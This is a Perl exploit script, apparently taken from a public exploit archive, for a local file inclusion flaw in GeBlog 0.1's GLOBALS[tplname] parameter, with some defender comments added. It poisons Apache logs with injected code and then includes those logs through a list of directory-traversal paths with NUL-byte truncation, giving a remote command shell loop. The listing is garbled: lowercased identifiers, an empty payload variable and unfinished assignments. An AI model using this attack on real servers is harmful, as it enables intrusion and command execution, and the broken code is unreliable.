GeBlog 0.1 GLOBALS[tplname] Local File Inclusion
#!/usr/bin/perl
# geblog 0.1(globals[tplname])local file inclusion exploit
# d.script: http://sourceforge.net/projects/geblog/
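# v.code: include "tpl/".$globals['tplname']."/html.func.inc.php";
#   (vulnerable line: the tplname value is concatenated into the include path; no validation is visible on this line)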
# discovered & coded by : gold_m = [mahmood_ali]
# contact:hacker_@w.cn
# greetz to: tryag-team & 4lkasrgold3n-team & asbmay's group
# thanx : alk()mand()z & q8trojan
use io::socket;
use lwp::simple;
#ripped
# Candidate locations of Apache access/error logs, written as relative
# traversal paths. Per the vulnerable line quoted in the header, the include
# path starts at "tpl/", so each entry climbs out of that directory.
# One entry is later selected by index and placed in the globals[tplname]
# request parameter.
# Defender view: these are the files a traversal through tplname tries to
# reach. The PHP process should not have read access to web-server logs, and
# an open_basedir restriction keeps includes inside the application tree.
# NOTE(review): the entry beginning "../../.. /" contains a stray space and
# "../../../../../var/log/access_log" is listed twice; both kept as captured.
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
# Argument check: when fewer than three arguments are counted, print the
# usage banner and exit without sending anything.
# The banner names three inputs: the target host, the application path, and
# an Apache log path.
if (@argv < 3) {
print "
===============================================================
| geblog 0.1(globals[tplname])local file inclusion exploit |
| gold.pl [victim] /tpl/default/ (apachepath) |
| ex: gold.pl [victim] /tpl/default/ ../logs/error.log |
---------------------------------------------------------------
| greetz to: tryag-team & 4lkasrgold3n-team & asbmay's group |
| thanx : alk()mand()z & q8trojan |
===============================================================
";
exit();
}
# Positional arguments: target host, path to the application, and a third
# value that is used further down as an index into @apache (the usage text
# shows a path there instead; the two do not agree).
# NOTE(review): this listing was damaged in extraction and is kept exactly
# as captured for analysis; it is documented here, not repaired.
$host=$argv[0];
$path=$argv[1];
$apachepath=$argv[2];
print "code is injecting in logfiles...\n";
# Stage 1 (log poisoning): a single request carries $code in both the
# request line and the User-Agent header, so the web server writes it into
# its access/error log. $code is empty in this capture.
# Detection: log entries whose request line or User-Agent holds script
# markup instead of a normal path or browser string.
$code="";
$socket = io::socket::inet->new(proto=>"tcp", peeraddr=>"$host", peerport=>"80") or die "connection failed.\n\n";
print $socket "get ".$path.$code." http/1.1\r\n";
print $socket "user-agent: ".$code."\r\n";
print $socket "host: ".$host."\r\n";
print $socket "connection: close\r\n\r\n";
close($socket);
print "write end to exit!\n";
print "if not working try another apache path\n\n";
# Stage 2 (inclusion): an interactive loop that continues until the entered
# text matches "end". The right-hand side of both "$cmd =" assignments is
# missing in this capture.
print "[shell] ";$cmd =
while($cmd !~ "end") {
# A fresh connection is opened for every iteration.
$socket = io::socket::inet->new(proto=>"tcp", peeraddr=>"$host", peerport=>"80") or die "connection failed.\n\n";
#now include parameter
# The request sets globals[tplname] to the selected log path followed by
# %00, and passes the entered text unencoded in a "cmd" query parameter.
# %00 is a NUL byte intended to cut off the "/html.func.inc.php" suffix that
# the vulnerable include appends; PHP rejects NUL bytes in file paths from
# 5.3.4 onward.
# NOTE(review): presumably the application lets request parameters populate
# $globals -- confirm against the application source.
# Mitigation: accept only known template directory names for tplname
# (allow-list), never a request-supplied path.
# Detection: requests where globals[tplname] contains "../" or "%00".
print $socket "get ".$path."index.php?globals[tplname]=".$apache[$apachepath]."%00&cmd=$cmd http/1.1\r\n";
print $socket "host: ".$host."\r\n";
print $socket "accept: */*\r\n";
print $socket "connection: close\r\n\r\n";
# Echo the raw HTTP response line by line.
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd =
}